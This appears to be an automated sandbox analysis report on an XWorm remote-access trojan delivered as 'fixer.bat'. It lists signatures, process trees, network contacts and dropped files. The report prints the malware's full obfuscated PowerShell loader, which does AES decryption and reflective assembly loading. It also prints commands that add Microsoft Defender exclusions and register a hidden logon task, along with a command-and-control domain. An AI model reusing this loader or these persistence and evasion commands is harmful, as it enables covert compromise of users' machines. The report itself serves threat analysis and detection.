Malware Analysis Report

2024-11-16 13:40

Sample ID 240601-j9s14sfc41
Target fixer.bat
SHA256 9dda0e575a133a77c6875c92f5749fd23e7522e17b7abab741a14ad50b7ba833
Tags xworm execution persistence rat trojan
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score 10/10

SHA256 9dda0e575a133a77c6875c92f5749fd23e7522e17b7abab741a14ad50b7ba833

Threat Level: Known bad

The file fixer.bat was found to be: Known bad.

Malicious Activity Summary

xworm execution persistence rat trojan

Detect Xworm Payload

Xworm

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Drops startup file

Checks computer location settings

Adds Run key to start application

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Runs net.exe

Delays execution with timeout.exe

Modifies registry class

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2024-06-01 08:22

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted 2024-06-01 08:22
Reported 2024-06-01 08:23
Platform win10v2004-20240508-en
Max time kernel 37s
Max time network 38s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fixer.bat"

Signatures

Detect Xworm Payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Drops startup file

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Public\\Runtime Broker.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\timeout.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2468 wrote to memory of 4332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2468 wrote to memory of 4332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4332 wrote to memory of 4760 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4332 wrote to memory of 4760 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2468 wrote to memory of 1512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2468 wrote to memory of 1512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2468 wrote to memory of 4548 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2468 wrote to memory of 4548 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4548 wrote to memory of 2340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4548 wrote to memory of 2340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4548 wrote to memory of 1904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4548 wrote to memory of 1904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 1904 wrote to memory of 3872 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1904 wrote to memory of 3872 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3872 wrote to memory of 1304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3872 wrote to memory of 1304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1304 wrote to memory of 2192 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1304 wrote to memory of 2192 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3872 wrote to memory of 4752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3872 wrote to memory of 4752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3872 wrote to memory of 3512 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3872 wrote to memory of 3512 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3512 wrote to memory of 2840 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3512 wrote to memory of 2840 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3512 wrote to memory of 3804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3512 wrote to memory of 3804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3512 wrote to memory of 3508 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3512 wrote to memory of 3508 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3512 wrote to memory of 8 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3512 wrote to memory of 8 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3512 wrote to memory of 3316 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3512 wrote to memory of 3316 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3316 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3316 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fixer.bat"

C:\Windows\system32\net.exe

net file

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 file

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VR+eOn3wLSvgp0FREd6usaXDBdd/ifgqMzCqfEQSJxE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D+0Hhw9QG/X6TQoVNa+B1g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $hHCjm=New-Object System.IO.MemoryStream(,$param_var); $MjNBp=New-Object System.IO.MemoryStream; $cyqkY=New-Object System.IO.Compression.GZipStream($hHCjm, [IO.Compression.CompressionMode]::Decompress); $cyqkY.CopyTo($MjNBp); $cyqkY.Dispose(); $hHCjm.Dispose(); $MjNBp.Dispose(); $MjNBp.ToArray();}function execute_function($param_var,$param2_var){ $ILtmu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YHkEa=$ILtmu.EntryPoint; $YHkEa.Invoke($null, $param2_var);}$XmQRG = 'C:\Users\Admin\AppData\Local\Temp\fixer.bat';$host.UI.RawUI.WindowTitle = $XmQRG;$YkELo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XmQRG).Split([Environment]::NewLine);foreach ($izSch in $YkELo) { if ($izSch.StartsWith('xHKZaTmGffiyfsNVmown')) { $wrsGY=$izSch.Substring(20); break; }}$payloads_var=[string[]]$wrsGY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_9_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_9.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_9.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_9.bat" "

C:\Windows\system32\net.exe

net file

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 file

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VR+eOn3wLSvgp0FREd6usaXDBdd/ifgqMzCqfEQSJxE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D+0Hhw9QG/X6TQoVNa+B1g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $hHCjm=New-Object System.IO.MemoryStream(,$param_var); $MjNBp=New-Object System.IO.MemoryStream; $cyqkY=New-Object System.IO.Compression.GZipStream($hHCjm, [IO.Compression.CompressionMode]::Decompress); $cyqkY.CopyTo($MjNBp); $cyqkY.Dispose(); $hHCjm.Dispose(); $MjNBp.Dispose(); $MjNBp.ToArray();}function execute_function($param_var,$param2_var){ $ILtmu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YHkEa=$ILtmu.EntryPoint; $YHkEa.Invoke($null, $param2_var);}$XmQRG = 'C:\Users\Admin\AppData\Roaming\Windows_Log_9.bat';$host.UI.RawUI.WindowTitle = $XmQRG;$YkELo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XmQRG).Split([Environment]::NewLine);foreach ($izSch in $YkELo) { if ($izSch.StartsWith('xHKZaTmGffiyfsNVmown')) { $wrsGY=$izSch.Substring(20); break; }}$payloads_var=[string[]]$wrsGY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Runtime Broker.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD9C6.tmp.bat""

C:\Windows\system32\timeout.exe

timeout 3

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 movie-buddy.gl.at.ply.gg udp
US 147.185.221.16:40572 movie-buddy.gl.at.ply.gg tcp
US 8.8.8.8:53 16.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp

Files

memory/4548-0-0x00007FFA6C413000-0x00007FFA6C415000-memory.dmp

memory/4548-11-0x00007FFA6C410000-0x00007FFA6CED1000-memory.dmp

memory/4548-10-0x0000025DF7610000-0x0000025DF7632000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_51143hyf.xux.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4548-12-0x00007FFA6C410000-0x00007FFA6CED1000-memory.dmp

memory/4548-13-0x0000025DF7A10000-0x0000025DF7A54000-memory.dmp

memory/4548-14-0x0000025DF7A60000-0x0000025DF7AD6000-memory.dmp

memory/4548-15-0x0000025DF54E0000-0x0000025DF54E8000-memory.dmp

memory/4548-16-0x0000025DF7600000-0x0000025DF7612000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 3ffce848af907464c20a20e1b430f78a
SHA1 fbcd91a5c226d474235be920cf49e3344893fc1f
SHA256 25213a6685a6fd21a2aa43c417891703333579ad784f3896976b44bcfcdb009e
SHA512 1adaf6d68441a32b459b6071dcfdae404ab1e37bb0c6511e08d49717f9043679bdd7ca3324be184ece522e6516eedc04203ffccb5f9ea790bd35a84db9b944bf

C:\Users\Admin\AppData\Roaming\Windows_Log_9.vbs

MD5 a06f75c614ce265849e2dfa949e03993
SHA1 72bf7a3ee49244d9ae4fbf92542aef881c83c630
SHA256 09c05316992d7c9470baee97e2a90e7d6ba3f390646f610dd8409d499271d9c8
SHA512 d036970d3376a99c5c4302a8609ee37d7f5dd6e959b3abaa304e904af7a17e5b860678731aa0fd873e23ce8e55a36b876097bd59f32d66054a4d651f54209d41

C:\Users\Admin\AppData\Roaming\Windows_Log_9.bat

MD5 1e16a3b0237093cea53d9dff9593c17a
SHA1 4227feac46a1a00827029d784442ca250c3d27b1
SHA256 9dda0e575a133a77c6875c92f5749fd23e7522e17b7abab741a14ad50b7ba833
SHA512 74bbadb0adf926c2cb7f7a5df7de53044c12bd9c4cdd21542c1190206ef8e3356678489c94c1fd099c47f2df8d9d9a981bbe71f3127ef7d402154fff76d10898

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 664dee2ab48c3453aa55cac8ecaa5a44
SHA1 9211491fa3bfb05ded40ac728c73e05ac7e2aca2
SHA256 a5d660246afdd69389db1f961d2d7fa69177d198cdbdc327218fde0ea68a4953
SHA512 dbeb4f57093348ec822e29c8cfd7d74ba0d2d7e26e7157f3fda18b2c3f05012513f1c4c06b2e2801429fa1e595e35dd7ba823c95570135f737f87ce3857fc4ff

memory/3512-46-0x000002C9F4990000-0x000002C9F49A2000-memory.dmp

memory/3512-47-0x000002C9F4A10000-0x000002C9F4A26000-memory.dmp

memory/4548-48-0x00007FFA6C410000-0x00007FFA6CED1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 00068d34580ca0b4e186c4a6f303b09e
SHA1 59fe7294b796d4848709b32042246f1bb73acfab
SHA256 68f5b87085e5d444e29c42f79d24740e03f6658edb8bd2230cce896aac871fa6
SHA512 96359172ef18684d8b81977a3d79246427ce0b328e160f2e8b548b338feb081817293b04593960f679915c42a5b86255b30f5b56d06318de8dcb4e77e9d277ea

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d42b6da621e8df5674e26b799c8e2aa
SHA1 ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA256 5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA512 53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f3bc9dee8a80a73a256a69e26fe61c07
SHA1 bc546c10ce1b4cb47b89ea60498384f88f96fa5a
SHA256 3c7f3194722f46cb07885da576daf720a5133913b3fbce4a3ef8c8040028364d
SHA512 be2d861832db826ee67f03e6a9151dc6802481c3b5984ce457e43cebecd162f60460ccf7ac5893169d01eff77e2a863c5e323d68e07f2b1b3d6dab5884f7ac6a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 170815947c2c60cbba6d92dbaa5fcda0
SHA1 ee35a1efbeefb6f4d02b5998ead396927b2b3c3e
SHA256 c8b10f1af94f31c428461e0982d069316295482cc3642589f538ab5f163bbacb
SHA512 b077a95d1fe0308903e0b690c08c96f205485c7f31f355d8e8f8b545f587538d618bdff2d5e93ae97491b2a14a4b9ef79f619c2acf067018567b5e8167727a83

C:\Users\Admin\AppData\Local\Temp\tmpD9C6.tmp.bat

MD5 d649dd1277ab7c2278808ce9aab3103e
SHA1 b96c2425fb03c8fc44151f3ab0d0ae28a9d81029
SHA256 9aa57a271ddad7106f6d49815e88700f69e69056329f65799e82d6ec41bc23f9
SHA512 f182e5d21fb679eb06db5eb7339c1ab8cc8ad4b7c495a6fba48e095b2d178d253278a13fd026a40146cad35b0c112e12afde614fff40c10fb0ce7296712d62ff

Analysis: behavioral2

Detonation Overview

Submitted 2024-06-01 08:22
Reported 2024-06-01 08:23
Platform win11-20240426-en
Max time kernel 37s
Max time network 38s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fixer.bat"

Signatures

Detect Xworm Payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops startup file

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Public\\Runtime Broker.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\timeout.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
